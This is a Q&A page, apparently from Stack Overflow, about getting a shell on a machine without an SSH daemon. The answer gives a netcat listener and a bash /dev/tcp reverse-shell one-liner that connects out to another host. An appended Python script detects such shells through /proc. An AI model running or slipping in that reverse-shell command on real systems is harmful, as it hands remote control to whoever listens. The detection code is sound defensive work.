How to open a shell without SSHD on the receiving end?

Submitted by 浪子不回头ぞ on 2019-12-23 02:32:15

Question


I have a machine without SSHD and I want to open a bash shell on this machine from a remote machine (that I can fully control).

Since I have SSH on my limited machine, I configured a reverse proxy:

$ ssh -R 19999:localhost:22 remoteuser@remotemachine

Now I have a connection on port 19999 from my "fully control" machine to my "limited" machine. How would I open a shell with this setup?


Answer 1:


You can pipe the input from some port directly to the bash. This is common practice when misusing various bugs in software. For example, run on your full-access machine:

nc -lvp 9999

And on the limited machine:

/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1

Here 192.168.122.1 is the IP of the full-control machine.

This will give you a shell of the second machine in the first one. But note that the connection is not encrypted. If you want encryption, you would need to add the TCP forwarding step (similar to what you propose above).
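
A defender-side check for what the command above leaves behind, as an added example that is not part of the original answer: because `>&` and `0>&1` put the shell's stdin, stdout and stderr on one TCP socket, it lists shell processes whose fds 0, 1 and 2 all resolve to the same socket found in `/proc/net/tcp`. Assumptions: Linux procfs, IPv4 only, little-endian host; the function names and the shell list are illustrative.

```python
import os
import socket
import struct

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}      # assumed list, extend as needed


def tcp_peers(proc_root):
    """Map socket inode -> 'ip:port' of the remote end, from <proc_root>/net/tcp."""
    peers = {}
    with open(os.path.join(proc_root, "net", "tcp")) as fh:
        next(fh, None)                             # skip the header row
        for line in fh:
            cols = line.split()
            if len(cols) < 10:
                continue
            ip_hex, port_hex = cols[2].split(":")  # rem_address column
            # IPv4 is printed as host-order hex; little-endian host assumed
            ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
            peers[cols[9]] = f"{ip}:{int(port_hex, 16)}"   # cols[9] is the inode
    return peers


def shells_on_tcp(proc_root="/proc"):
    """Return (pid, comm, peer) for shells whose fds 0, 1 and 2 share one TCP socket."""
    peers = tcp_peers(proc_root)
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            links = {os.readlink(os.path.join(base, "fd", n)) for n in "012"}
        except OSError:                            # process exited or no permission
            continue
        if comm not in SHELLS or len(links) != 1:
            continue                               # e.g. a pty or mixed redirections
        target = links.pop()                       # looks like "socket:[48213]"
        if target.startswith("socket:["):
            inode = target[len("socket:["):-1]
            if inode in peers:                     # unix sockets are not in net/tcp
                hits.append((int(pid), comm, peers[inode]))
    return sorted(hits)


if __name__ == "__main__":
    for pid, comm, peer in shells_on_tcp():
        print(f"pid={pid} comm={comm} stdio -> tcp {peer}")
```

Run it as root to see every process's fd table; a shell started from a terminal or by sshd with a pty shows `/dev/pts/N` on these descriptors and is not reported.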



Source: https://stackoverflow.com/questions/38828725/how-to-open-a-shell-without-sshd-on-the-receiving-end
